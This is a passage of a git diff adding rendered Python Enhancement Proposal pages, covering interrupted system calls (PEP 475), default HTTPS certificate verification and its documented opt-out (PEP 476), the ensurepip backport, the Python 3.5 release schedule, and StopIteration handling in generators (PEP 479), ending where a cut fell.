os.close, close() methods and os.dup2() are a special case: they +will ignore EINTR instead of retrying. The reason is complex but involves +behaviour under Linux and the fact that the file descriptor may really be +closed even if EINTR is returned. See articles:

+ +

The socket.socket.connect() method does not retry connect() for +non-blocking sockets if it is interrupted by a signal (fails with EINTR). +The connection runs asynchronously in background. The caller is responsible +to wait until the socket becomes writable (ex: using select.select()) +and then call socket.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) +to check if the connection succeeded (getsockopt() returns 0) or failed.

+
+
+

InterruptedError handling

+

Since interrupted system calls are automatically retried, the +InterruptedError exception should not occur anymore when calling those +system calls. Therefore, manual handling of InterruptedError as +described in Status in Python 3.4 can be removed, which will simplify +standard library code.

+
+
+
+

Backward compatibility

+

Applications relying on the fact that system calls are interrupted +with InterruptedError will hang. The authors of this PEP don’t +think that such applications exist, since they would be exposed to +other issues such as race conditions (there is an opportunity for deadlock +if the signal comes before the system call). Besides, such code would +be non-portable.

+

In any case, those applications must be fixed to handle signals differently, +to have a reliable behaviour on all platforms and all Python versions. +A possible strategy is to set up a signal handler raising a well-defined +exception, or use a wakeup file descriptor.

+

For applications using event loops, signal.set_wakeup_fd() is the +recommended option to handle signals. Python’s low-level signal handler +will write signal numbers into the file descriptor and the event loop +will be awaken to read them. The event loop can handle those signals +without the restriction of signal handlers (for example, the loop can +be woken up in any thread, not just the main thread).

+
+
+

Appendix

+
+

Wakeup file descriptor

+

Since Python 3.3, signal.set_wakeup_fd() writes the signal number +into the file descriptor, whereas it only wrote a null byte before. +It becomes possible to distinguish between signals using the wakeup file +descriptor.

+

Linux has a signalfd() system call which provides more information on +each signal. For example, it’s possible to know the pid and uid who sent +the signal. This function is not exposed in Python yet (see +issue 12304).

+

On Unix, the asyncio module uses the wakeup file descriptor to +wake up its event loop.

+
+
+

Multithreading

+

A C signal handler can be called from any thread, but Python +signal handlers will always be called in the main Python thread.

+

Python’s C API provides the PyErr_SetInterrupt() function which calls +the SIGINT signal handler in order to interrupt the main Python thread.

+
+
+

Signals on Windows

+
+

Control events

+

Windows uses “control events”:

+
    +
  • CTRL_BREAK_EVENT: Break (SIGBREAK)
  • +
  • CTRL_CLOSE_EVENT: Close event
  • +
  • CTRL_C_EVENT: CTRL+C (SIGINT)
  • +
  • CTRL_LOGOFF_EVENT: Logoff
  • +
  • CTRL_SHUTDOWN_EVENT: Shutdown
  • +
+

The SetConsoleCtrlHandler() function +can be used to install a control handler.

+

The CTRL_C_EVENT and CTRL_BREAK_EVENT events can be sent to a +process using the GenerateConsoleCtrlEvent() function. +This function is exposed in Python as os.kill().

+
+
+

Signals

+

The following signals are supported on Windows:

+
    +
  • SIGABRT
  • +
  • SIGBREAK (CTRL_BREAK_EVENT): signal only available on Windows
  • +
  • SIGFPE
  • +
  • SIGILL
  • +
  • SIGINT (CTRL_C_EVENT)
  • +
  • SIGSEGV
  • +
  • SIGTERM
  • +
+
+
+

SIGINT

+

The default Python signal handler for SIGINT sets a Windows event +object: sigint_event.

+

time.sleep() is implemented with WaitForSingleObjectEx(), it +waits for the sigint_event object using time.sleep() parameter +as the timeout. So the sleep can be interrupted by SIGINT.

+

_winapi.WaitForMultipleObjects() automatically adds +sigint_event to the list of watched handles, so it can also be +interrupted.

+

PyOS_StdioReadline() also used sigint_event when fgets() +failed to check if Ctrl-C or Ctrl-Z was pressed.

+
+
+ +
+
+

Implementation

+

The implementation is tracked in issue 23285. It was committed on +February 07, 2015.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0475.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0476/index.html b/pep-0476/index.html new file mode 100644 index 00000000000..e99fc52aa00 --- /dev/null +++ b/pep-0476/index.html @@ -0,0 +1,337 @@ + + + + + + + + PEP 476 – Enabling certificate verification by default for stdlib http clients | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 476 – Enabling certificate verification by default for stdlib http clients

+
+
Author:
+
Alex Gaynor <alex.gaynor at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Aug-2014
+
Python-Version:
+
2.7.9, 3.4.3, 3.5
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Currently when a standard library http client (the urllib, urllib2, +http, and httplib modules) encounters an https:// URL it will wrap +the network HTTP traffic in a TLS stream, as is necessary to communicate with +such a server. However, during the TLS handshake it will not actually check +that the server has an X509 certificate is signed by a CA in any trust root, +nor will it verify that the Common Name (or Subject Alternate Name) on the +presented certificate matches the requested host.

+

The failure to do these checks means that anyone with a privileged network +position is able to trivially execute a man in the middle attack against a +Python application using either of these HTTP clients, and change traffic at +will.

+

This PEP proposes to enable verification of X509 certificate signatures, as +well as hostname verification for Python’s HTTP clients by default, subject to +opt-out on a per-call basis. This change would be applied to Python 2.7, Python +3.4, and Python 3.5.

+
+
+

Rationale

+

The “S” in “HTTPS” stands for secure. When Python’s users type “HTTPS” they are +expecting a secure connection, and Python should adhere to a reasonable +standard of care in delivering this. Currently we are failing at this, and in +doing so, APIs which appear simple are misleading users.

+

When asked, many Python users state that they were not aware that Python failed +to perform these validations, and are shocked.

+

The popularity of requests (which enables these checks by default) +demonstrates that these checks are not overly burdensome in any way, and the +fact that it is widely recommended as a major security improvement over the +standard library clients demonstrates that many expect a higher standard for +“security by default” from their tools.

+

The failure of various applications to note Python’s negligence in this matter +is a source of regular CVE assignment [1] [2] [3] [4] [5] [6] [7] [8] +[9] [10] [11].

+ +
+
+

Technical Details

+

Python would use the system provided certificate database on all platforms. +Failure to locate such a database would be an error, and users would need to +explicitly specify a location to fix it.

+

This will be achieved by adding a new ssl._create_default_https_context +function, which is the same as ssl.create_default_context.

+

http.client can then replace its usage of ssl._create_stdlib_context +with the ssl._create_default_https_context.

+

Additionally ssl._create_stdlib_context is renamed +ssl._create_unverified_context (an alias is kept around for backwards +compatibility reasons).

+
+

Trust database

+

This PEP proposes using the system-provided certificate database. Previous +discussions have suggested bundling Mozilla’s certificate database and using +that by default. This was decided against for several reasons:

+
    +
  • Using the platform trust database imposes a lower maintenance burden on the +Python developers – shipping our own trust database would require doing a +release every time a certificate was revoked.
  • +
  • Linux vendors, and other downstreams, would unbundle the Mozilla +certificates, resulting in a more fragmented set of behaviors.
  • +
  • Using the platform stores makes it easier to handle situations such as +corporate internal CAs.
  • +
+

OpenSSL also has a pair of environment variables, SSL_CERT_DIR and +SSL_CERT_FILE which can be used to point Python at a different certificate +database.

+
+
+

Backwards compatibility

+

This change will have the appearance of causing some HTTPS connections to +“break”, because they will now raise an Exception during handshake.

+

This is misleading however, in fact these connections are presently failing +silently, an HTTPS URL indicates an expectation of confidentiality and +authentication. The fact that Python does not actually verify that the user’s +request has been made is a bug, further: “Errors should never pass silently.”

+

Nevertheless, users who have a need to access servers with self-signed or +incorrect certificates would be able to do so by providing a context with +custom trust roots or which disables validation (documentation should strongly +recommend the former where possible). Users will also be able to add necessary +certificates to system trust stores in order to trust them globally.

+

Twisted’s 14.0 release made this same change, and it has been met with almost +no opposition.

+
+
+

Opting out

+

For users who wish to opt out of certificate verification on a single +connection, they can achieve this by providing the context argument to +urllib.urlopen:

+
import ssl
+
+# This restores the same behavior as before.
+context = ssl._create_unverified_context()
+urllib.urlopen("https://no-valid-cert", context=context)
+
+
+

It is also possible, though highly discouraged, to globally disable +verification by monkeypatching the ssl module in versions of Python that +implement this PEP:

+
import ssl
+
+try:
+    _create_unverified_https_context = ssl._create_unverified_context
+except AttributeError:
+    # Legacy Python that doesn't verify HTTPS certificates by default
+    pass
+else:
+    # Handle target environment that doesn't support HTTPS verification
+    ssl._create_default_https_context = _create_unverified_https_context
+
+
+

This guidance is aimed primarily at system administrators that wish to adopt +newer versions of Python that implement this PEP in legacy environments that +do not yet support certificate verification on HTTPS connections. For +example, an administrator may opt out by adding the monkeypatch above to +sitecustomize.py in their Standard Operating Environment for Python. +Applications and libraries SHOULD NOT be making this change process wide +(except perhaps in response to a system administrator controlled configuration +setting).

+

Particularly security sensitive applications should always provide an explicit +application defined SSL context rather than relying on the default behaviour +of the underlying Python implementation.

+
+
+
+

Other protocols

+

This PEP only proposes requiring this level of validation for HTTP clients, not +for other protocols such as SMTP.

+

This is because while a high percentage of HTTPS servers have correct +certificates, as a result of the validation performed by browsers, for other +protocols self-signed or otherwise incorrect certificates are far more common. +Note that for SMTP at least, this appears to be changing and should be reviewed +for a potential similar PEP in the future:

+ +
+
+

Python Versions

+

This PEP describes changes that will occur on both the 3.4.x, 3.5 and 2.7.X +branches. For 2.7.X this will require backporting the context +(SSLContext) argument to httplib, in addition to the features already +backported in PEP 466.

+
+
+

Implementation

+
    +
  • LANDED: Issue 22366 adds the +context argument to urlib.request.urlopen.
  • +
  • Issue 22417 implements the substance +of this PEP.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0476.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0477/index.html b/pep-0477/index.html new file mode 100644 index 00000000000..8d4493d35ad --- /dev/null +++ b/pep-0477/index.html @@ -0,0 +1,251 @@ + + + + + + + + PEP 477 – Backport ensurepip (PEP 453) to Python 2.7 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 477 – Backport ensurepip (PEP 453) to Python 2.7

+
+
Author:
+
Donald Stufft <donald at stufft.io>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Aug-2014
+
Post-History:
+
01-Sep-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes that the ensurepip module, added to Python 3.4 by PEP +453, be backported to Python 2.7. It also proposes that automatic invocation +of ensurepip be added to the Python 2.7 Windows and OSX installers. However +it does not propose that automatic invocation be added to the Makefile.

+

It also proposes that the documentation changes for the package distribution +and installation guides be updated to match that in 3.4, which references using +the ensurepip module to bootstrap the installer.

+
+
+

Rationale

+

Python 2.7 is effectively a LTS release of Python which represents the end of +the 2.x series and there is still a very large contingent of users whom are +still using Python 2.7 as their primary version. These users, in order to +participate in the wider Python ecosystem, must manually attempt to go out and +find the correct way to bootstrap the packaging tools.

+

It is the opinion of this PEP that making it as easy as possible for end users +to participate in the wider Python ecosystem is important for 3 primary +reasons:

+
    +
  1. The Python 2.x to 3.x migration has a number of painpoints that are eased by +a number of third party modules such as six [1], modernize [2], +or future [3]. However relying on these tools requires that everyone +who uses the project have a tool to install these packages.
  2. +
  3. In addition to tooling to aid in migration from Python 2.x to 3.x, there are +also a number of modules that are new in Python 3 for which there are +backports available on PyPI. This can also aid in the ability for people +to write 2.x and 3.x compatible software as well as enable them to use some +of the newer features of Python 3 on Python 2.
  4. +
  5. Users also will need a number of tools in order to create python packages +that conform to the newer standards that are being proposed. Things like +setuptools [4], Wheel [5], and twine [6] are enabling +a safer, faster, and more reliable packaging tool chain. These tools can be +difficult for people to use if first they must be told how to go out and +install the package manager.
  6. +
  7. One of Pythons biggest strengths is in the huge ecosystem of libraries and +projects that have been built on top of it, most of which are distributed +through PyPI. However, in order to benefit from this wide ecosystem +meaningfully requires end users, some of which are going to be new, to make +a decision on which package manager they should get, how to get it, and then +finally actually installing it first.
  8. +
+

Furthermore, alternative implementations of Python are recognizing the benefits +of PEP 453 and both PyPy and Jython have plans to backport ensurepip to their +2.7 runtimes.

+
+
+

Automatic Invocation

+

PEP 453 has ensurepip automatically invoked by default in the Makefile +and the Windows and OSX Installers. This allowed it to ensure that, by default, +all users would get Python with pip already installed. This PEP however +believes that while this is fine for the Python 2.7 Windows and Mac OS X +installers it is not ok for the Python 2.7 Makefile in general.

+

The primary consumers of the Makefile are downstream package managers which +distribute Python themselves. These downstream distributors typically do not +want pip to be installed via ensurepip and would prefer that end users +install it with their own package manager. Not invoking ensurepip +automatically from the Makefile would allow these distributors to simply +ignore the fact that ensurepip has been backported and still not end up +with pip installed via it.

+

The primary consumers of the OSX and Windows installers are end users who are +attempting to install Python on their own machine. There is not a package +manager available where these users can install pip into their Python through +a more supported mechanism. For this reason it is the belief of this PEP that +installing by default on OSX and Windows is the best course of action.

+
+
+

Documentation

+

As part of this PEP, the updated packaging distribution and installation +guides for Python 3.4 would be backported to Python 2.7.

+
+
+

Disabling ensurepip by Downstream Distributors

+

Due to its use in the venv module, downstream distributors cannot disable +the ensurepip module in Python 3.4. However, since Python 2.7 has no such +module it is explicitly allowed for downstream distributors to patch the +ensurepip module to prevent it from installing anything.

+

If a downstream distributor wishes to disable ensurepip completely in +Python 2.7, they should still at least provide the module and allow +python -m ensurepip style invocation. However it should raise errors or +otherwise exit with a non-zero exit code and print out an error on stderr +directing users to what they can/should use instead of ensurepip.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0477.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0478/index.html b/pep-0478/index.html new file mode 100644 index 00000000000..06d31d92eec --- /dev/null +++ b/pep-0478/index.html @@ -0,0 +1,212 @@ + + + + + + + + PEP 478 – Python 3.5 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 478 – Python 3.5 Release Schedule

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
22-Sep-2014
+
Python-Version:
+
3.5
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.5. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.5 Release Manager: Larry Hastings
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Georg Brandl
  • +
+
+
+

Release Schedule

+

Python 3.5 has now reached its end-of-life and has been retired. +No more releases will be made.

+

These are all the historical releases of Python 3.5, +including their release dates.

+
    +
  • 3.5.0 alpha 1: February 8, 2015
  • +
  • 3.5.0 alpha 2: March 9, 2015
  • +
  • 3.5.0 alpha 3: March 29, 2015
  • +
  • 3.5.0 alpha 4: April 19, 2015
  • +
  • 3.5.0 beta 1: May 24, 2015 +(Beta 1 is also “feature freeze”–no new features beyond this point.)
  • +
  • 3.5.0 beta 2: May 31, 2015
  • +
  • 3.5.0 beta 3: July 5, 2015
  • +
  • 3.5.0 beta 4: July 26, 2015
  • +
  • 3.5.0 release candidate 1: August 10, 2015
  • +
  • 3.5.0 release candidate 2: August 25, 2015
  • +
  • 3.5.0 release candidate 3: September 7, 2015
  • +
  • 3.5.0 final: September 13, 2015
  • +
  • 3.5.1 release candidate 1: November 22, 2015
  • +
  • 3.5.1 final: December 6, 2015
  • +
  • 3.5.2 release candidate 1: Sunday, June 12, 2016
  • +
  • 3.5.2 final: Sunday, June 26, 2016
  • +
  • 3.5.3 candidate 1: January 2, 2017
  • +
  • 3.5.3 final: January 17, 2017
  • +
  • 3.5.4 candidate 1: July 25, 2017
  • +
  • 3.5.4 final: August 8, 2017
  • +
  • 3.5.5 candidate 1: January 23, 2018
  • +
  • 3.5.5 final: February 4, 2018
  • +
  • 3.5.6 candidate 1: July 19, 2018
  • +
  • 3.5.6 final: August 2, 2018
  • +
  • 3.5.7 candidate 1: March 4, 2019
  • +
  • 3.5.7 final: March 18, 2019
  • +
  • 3.5.8 candidate 1: September 9, 2019
  • +
  • 3.5.8 candidate 2: October 12, 2019
  • +
  • 3.5.8 final: October 29, 2019
  • +
  • 3.5.9 final: November 1, 2019
  • +
  • 3.5.10 rc1: August 21, 2020
  • +
  • 3.5.10 final: September 5, 2020
  • +
+
+
+

Features for 3.5

+
    +
  • PEP 441, improved Python zip application support
  • +
  • PEP 448, additional unpacking generalizations
  • +
  • PEP 461, “%-formatting” for bytes and bytearray objects
  • +
  • PEP 465, a new operator (“@”) for matrix multiplication
  • +
  • PEP 471, os.scandir(), a fast new directory traversal function
  • +
  • PEP 475, adding support for automatic retries of interrupted system calls
  • +
  • PEP 479, change StopIteration handling inside generators
  • +
  • PEP 484, the typing module, a new standard for type annotations
  • +
  • PEP 485, math.isclose(), a function for testing approximate equality
  • +
  • PEP 486, making the Windows Python launcher aware of virtual environments
  • +
  • PEP 488, eliminating .pyo files
  • +
  • PEP 489, a new and improved mechanism for loading extension modules
  • +
  • PEP 492, coroutines with async and await syntax
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0478.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0479/index.html b/pep-0479/index.html new file mode 100644 index 00000000000..68ad7b1db8f --- /dev/null +++ b/pep-0479/index.html @@ -0,0 +1,743 @@ + + + + + + + + PEP 479 – Change StopIteration handling inside generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 479 – Change StopIteration handling inside generators

+
+
Author:
+
Chris Angelico <rosuav at gmail.com>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Nov-2014
+
Python-Version:
+
3.5
+
Post-History:
+
15-Nov-2014, 19-Nov-2014, 05-Dec-2014
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a change to generators: when StopIteration is +raised inside a generator, it is replaced with RuntimeError. +(More precisely, this happens when the exception is about to bubble +out of the generator’s stack frame.) Because the change is backwards +incompatible, the feature is initially introduced using a +__future__ statement.

+
+
+

Acceptance

+

This PEP was accepted by the BDFL on November 22. Because of the +exceptionally short period from first draft to acceptance, the main +objections brought up after acceptance were carefully considered and +have been reflected in the “Alternate proposals” section below. +However, none of the discussion changed the BDFL’s mind and the PEP’s +acceptance is now final. (Suggestions for clarifying edits are still +welcome – unlike IETF RFCs, the text of a PEP is not cast in stone +after its acceptance, although the core design/plan/specification +should not change after acceptance.)

+
+
+

Rationale

+

The interaction of generators and StopIteration is currently +somewhat surprising, and can conceal obscure bugs. An unexpected +exception should not result in subtly altered behaviour, but should +cause a noisy and easily-debugged traceback. Currently, +StopIteration raised accidentally inside a generator function will +be interpreted as the end of the iteration by the loop construct +driving the generator.

+

The main goal of the proposal is to ease debugging in the situation +where an unguarded next() call (perhaps several stack frames deep) +raises StopIteration and causes the iteration controlled by the +generator to terminate silently. (Whereas, when some other exception +is raised, a traceback is printed pinpointing the cause of the +problem.)

+

This is particularly pernicious in combination with the yield from +construct of PEP 380, as it breaks the abstraction that a +subgenerator may be factored out of a generator. That PEP notes this +limitation, but notes that “use cases for these [are] rare to +non-existent”. Unfortunately while intentional use is rare, it is +easy to stumble on these cases by accident:

+
import contextlib
+
+@contextlib.contextmanager
+def transaction():
+    print('begin')
+    try:
+        yield from do_it()
+    except:
+        print('rollback')
+        raise
+    else:
+        print('commit')
+
+def do_it():
+    print('Refactored initial setup')
+    yield # Body of with-statement is executed here
+    print('Refactored finalization of successful transaction')
+
+def gene():
+    for i in range(2):
+        with transaction():
+            yield i
+            # return
+            raise StopIteration  # This is wrong
+        print('Should not be reached')
+
+for i in gene():
+    print('main: i =', i)
+
+
+

Here factoring out do_it into a subgenerator has introduced a +subtle bug: if the wrapped block raises StopIteration, under the +current behavior this exception will be swallowed by the context +manager; and, worse, the finalization is silently skipped! Similarly +problematic behavior occurs when an asyncio coroutine raises +StopIteration, causing it to terminate silently, or when next +is used to take the first result from an iterator that unexpectedly +turns out to be empty, for example:

+
# using the same context manager as above
+import pathlib
+
+with transaction():
+    print('commit file {}'.format(
+        # I can never remember what the README extension is
+        next(pathlib.Path('/some/dir').glob('README*'))))
+
+
+

In both cases, the refactoring abstraction of yield from breaks +in the presence of bugs in client code.

+

Additionally, the proposal reduces the difference between list +comprehensions and generator expressions, preventing surprises such as +the one that started this discussion [2]. Henceforth, the following +statements will produce the same result if either produces a result at +all:

+
a = list(F(x) for x in xs if P(x))
+a = [F(x) for x in xs if P(x)]
+
+
+

With the current state of affairs, it is possible to write a function +F(x) or a predicate P(x) that causes the first form to produce +a (truncated) result, while the second form raises an exception +(namely, StopIteration). With the proposed change, both forms +will raise an exception at this point (albeit RuntimeError in the +first case and StopIteration in the second).

+

Finally, the proposal also clears up the confusion about how to +terminate a generator: the proper way is return, not +raise StopIteration.

+

As an added bonus, the above changes bring generator functions much +more in line with regular functions. If you wish to take a piece of +code presented as a generator and turn it into something else, you +can usually do this fairly simply, by replacing every yield with +a call to print() or list.append(); however, if there are any +bare next() calls in the code, you have to be aware of them. If +the code was originally written without relying on StopIteration +terminating the function, the transformation would be that much +easier.

+
+
+

Background information

+

When a generator frame is (re)started as a result of a __next__() +(or send() or throw()) call, one of three outcomes can occur:

+
    +
  • A yield point is reached, and the yielded value is returned.
  • +
  • The frame is returned from; StopIteration is raised.
  • +
  • An exception is raised, which bubbles out.
  • +
+

In the latter two cases the frame is abandoned (and the generator +object’s gi_frame attribute is set to None).

+
+
+

Proposal

+

If a StopIteration is about to bubble out of a generator frame, it +is replaced with RuntimeError, which causes the next() call +(which invoked the generator) to fail, passing that exception out. +From then on it’s just like any old exception. [3]

+

This affects the third outcome listed above, without altering any +other effects. Furthermore, it only affects this outcome when the +exception raised is StopIteration (or a subclass thereof).

+

Note that the proposed replacement happens at the point where the +exception is about to bubble out of the frame, i.e. after any +except or finally blocks that could affect it have been +exited. The StopIteration raised by returning from the frame is +not affected (the point being that StopIteration means that the +generator terminated “normally”, i.e. it did not raise an exception).

+

A subtle issue is what will happen if the caller, having caught the +RuntimeError, calls the generator object’s __next__() method +again. The answer is that from this point on it will raise +StopIteration – the behavior is the same as when any other +exception was raised by the generator.

+

Another logical consequence of the proposal: if someone uses +g.throw(StopIteration) to throw a StopIteration exception into +a generator, if the generator doesn’t catch it (which it could do +using a try/except around the yield), it will be transformed +into RuntimeError.

+

During the transition phase, the new feature must be enabled +per-module using:

+
from __future__ import generator_stop
+
+
+

Any generator function constructed under the influence of this +directive will have the REPLACE_STOPITERATION flag set on its code +object, and generators with the flag set will behave according to this +proposal. Once the feature becomes standard, the flag may be dropped; +code should not inspect generators for it.

+

A proof-of-concept patch has been created to facilitate testing. [4]

+
+
+

Consequences for existing code

+

This change will affect existing code that depends on +StopIteration bubbling up. The pure Python reference +implementation of groupby [5] currently has comments “Exit on +StopIteration” where it is expected that the exception will +propagate and then be handled. This will be unusual, but not unknown, +and such constructs will fail. Other examples abound, e.g. [6], [7].

+

(Alyssa Coghlan comments: “””If you wanted to factor out a helper +function that terminated the generator you’d have to do “return +yield from helper()” rather than just “helper()”.”””)

+

There are also examples of generator expressions floating around that +rely on a StopIteration raised by the expression, the target or the +predicate (rather than by the __next__() call implied in the for +loop proper).

+
+

Writing backwards and forwards compatible code

+

With the exception of hacks that raise StopIteration to exit a +generator expression, it is easy to write code that works equally well +under older Python versions as under the new semantics.

+

This is done by enclosing those places in the generator body where a +StopIteration is expected (e.g. bare next() calls or in some +cases helper functions that are expected to raise StopIteration) +in a try/except construct that returns when StopIteration is +raised. The try/except construct should appear directly in the +generator function; doing this in a helper function that is not itself +a generator does not work. If raise StopIteration occurs directly +in a generator, simply replace it with return.

+
+
+

Examples of breakage

+

Generators which explicitly raise StopIteration can generally be +changed to simply return instead. This will be compatible with all +existing Python versions, and will not be affected by __future__. +Here are some illustrations from the standard library.

+

Lib/ipaddress.py:

+
if other == self:
+    raise StopIteration
+
+
+

Becomes:

+
if other == self:
+    return
+
+
+

In some cases, this can be combined with yield from to simplify +the code, such as Lib/difflib.py:

+
if context is None:
+    while True:
+        yield next(line_pair_iterator)
+
+
+

Becomes:

+
if context is None:
+    yield from line_pair_iterator
+    return
+
+
+

(The return is necessary for a strictly-equivalent translation, +though in this particular file, there is no further code, and the +return can be omitted.) For compatibility with pre-3.3 versions +of Python, this could be written with an explicit for loop:

+
if context is None:
+    for line in line_pair_iterator:
+        yield line
+    return
+
+
+

More complicated iteration patterns will need explicit try/except +constructs. For example, a hypothetical parser like this:

+
def parser(f):
+    while True:
+        data = next(f)
+        while True:
+            line = next(f)
+            if line == "- end -": break
+            data += line
+        yield data
+
+
+

would need to be rewritten as:

+
def parser(f):
+    while True:
+        try:
+            data = next(f)
+            while True:
+                line = next(f)
+                if line == "- end -": break
+                data += line
+            yield data
+        except StopIteration:
+            return
+
+
+

or possibly:

+
def parser(f):
+    for data in f:
+        while True:
+            line = next(f)
+            if line == "- end -": break
+            data += line
+        yield data
+
+
+

The latter form obscures the iteration by purporting to iterate over +the file with a for loop, but then also fetches more data from +the same iterator during the loop body. It does, however, clearly +differentiate between a “normal” termination (StopIteration +instead of the initial line) and an “abnormal” termination (failing +to find the end marker in the inner loop, which will now raise +RuntimeError).

+

This effect of StopIteration has been used to cut a generator +expression short, creating a form of takewhile:

+
def stop():
+    raise StopIteration
+print(list(x for x in range(10) if x < 5 or stop()))
+# prints [0, 1, 2, 3, 4]
+
+
+

Under the current proposal, this form of non-local flow control is +not supported, and would have to be rewritten in statement form:

+
def gen():
+    for x in range(10):
+        if x >= 5: return
+        yield x
+print(list(gen()))
+# prints [0, 1, 2, 3, 4]
+
+
+

While this is a small loss of functionality, it is functionality that +often comes at the cost of readability, and just as lambda has +restrictions compared to def, so does a generator expression have +restrictions compared to a generator function. In many cases, the +transformation to full generator function will be trivially easy, and +may improve structural clarity.

+
+
+
+

Explanation of generators, iterators, and StopIteration

+

The proposal does not change the relationship between generators and +iterators: a generator object is still an iterator, and not all +iterators are generators. Generators have additional methods that +iterators don’t have, like send and throw. All this is +unchanged. Nothing changes for generator users – only authors of +generator functions may have to learn something new. (This includes +authors of generator expressions that depend on early termination of +the iteration by a StopIteration raised in a condition.)

+

An iterator is an object with a __next__ method. Like many other +special methods, it may either return a value, or raise a specific +exception - in this case, StopIteration - to signal that it has +no value to return. In this, it is similar to __getattr__ (can +raise AttributeError), __getitem__ (can raise KeyError), +and so on. A helper function for an iterator can be written to +follow the same protocol; for example:

+
def helper(x, y):
+    if x > y: return 1 / (x - y)
+    raise StopIteration
+
+def __next__(self):
+    if self.a: return helper(self.b, self.c)
+    return helper(self.d, self.e)
+
+
+

Both forms of signalling are carried through: a returned value is +returned, an exception bubbles up. The helper is written to match +the protocol of the calling function.

+

A generator function is one which contains a yield expression. +Each time it is (re)started, it may either yield a value, or return +(including “falling off the end”). A helper function for a generator +can also be written, but it must also follow generator protocol:

+
def helper(x, y):
+    if x > y: yield 1 / (x - y)
+
+def gen(self):
+    if self.a: return (yield from helper(self.b, self.c))
+    return (yield from helper(self.d, self.e))
+
+
+

In both cases, any unexpected exception will bubble up. Due to the +nature of generators and iterators, an unexpected StopIteration +inside a generator will be converted into RuntimeError, but +beyond that, all exceptions will propagate normally.

+
+
+

Transition plan

+
    +
  • Python 3.5: Enable new semantics under __future__ import; silent +deprecation warning if StopIteration bubbles out of a generator +not under __future__ import.
  • +
  • Python 3.6: Non-silent deprecation warning.
  • +
  • Python 3.7: Enable new semantics everywhere.
  • +
+
+
+

Alternate proposals

+
+

Raising something other than RuntimeError

+

Rather than the generic RuntimeError, it might make sense to raise +a new exception type UnexpectedStopIteration. This has the +downside of implicitly encouraging that it be caught; the correct +action is to catch the original StopIteration, not the chained +exception.

+
+
+

Supplying a specific exception to raise on return

+

Alyssa (Nick) Coghlan suggested a means of providing a specific +StopIteration instance to the generator; if any other instance of +StopIteration is raised, it is an error, but if that particular +one is raised, the generator has properly completed. This subproposal +has been withdrawn in favour of better options, but is retained for +reference.

+
+
+

Making return-triggered StopIterations obvious

+

For certain situations, a simpler and fully backward-compatible +solution may be sufficient: when a generator returns, instead of +raising StopIteration, it raises a specific subclass of +StopIteration (GeneratorReturn) which can then be detected. +If it is not that subclass, it is an escaping exception rather than a +return statement.

+

The inspiration for this alternative proposal was Alyssa’s observation +[8] that if an asyncio coroutine [9] accidentally raises +StopIteration, it currently terminates silently, which may present +a hard-to-debug mystery to the developer. The main proposal turns +such accidents into clearly distinguishable RuntimeError exceptions, +but if that is rejected, this alternate proposal would enable +asyncio to distinguish between a return statement and an +accidentally-raised StopIteration exception.

+

Of the three outcomes listed above, two change:

+
    +
  • If a yield point is reached, the value, obviously, would still be +returned.
  • +
  • If the frame is returned from, GeneratorReturn (rather than +StopIteration) is raised.
  • +
  • If an instance of GeneratorReturn would be raised, instead an +instance of StopIteration would be raised. Any other exception +bubbles up normally.
  • +
+

In the third case, the StopIteration would have the value of +the original GeneratorReturn, and would reference the original +exception in its __cause__. If uncaught, this would clearly show +the chaining of exceptions.

+

This alternative does not affect the discrepancy between generator +expressions and list comprehensions, but allows generator-aware code +(such as the contextlib and asyncio modules) to reliably +differentiate between the second and third outcomes listed above.

+

However, once code exists that depends on this distinction between +GeneratorReturn and StopIteration, a generator that invokes +another generator and relies on the latter’s StopIteration to +bubble out would still be potentially wrong, depending on the use made +of the distinction between the two exception types.

+
+
+

Converting the exception inside next()

+

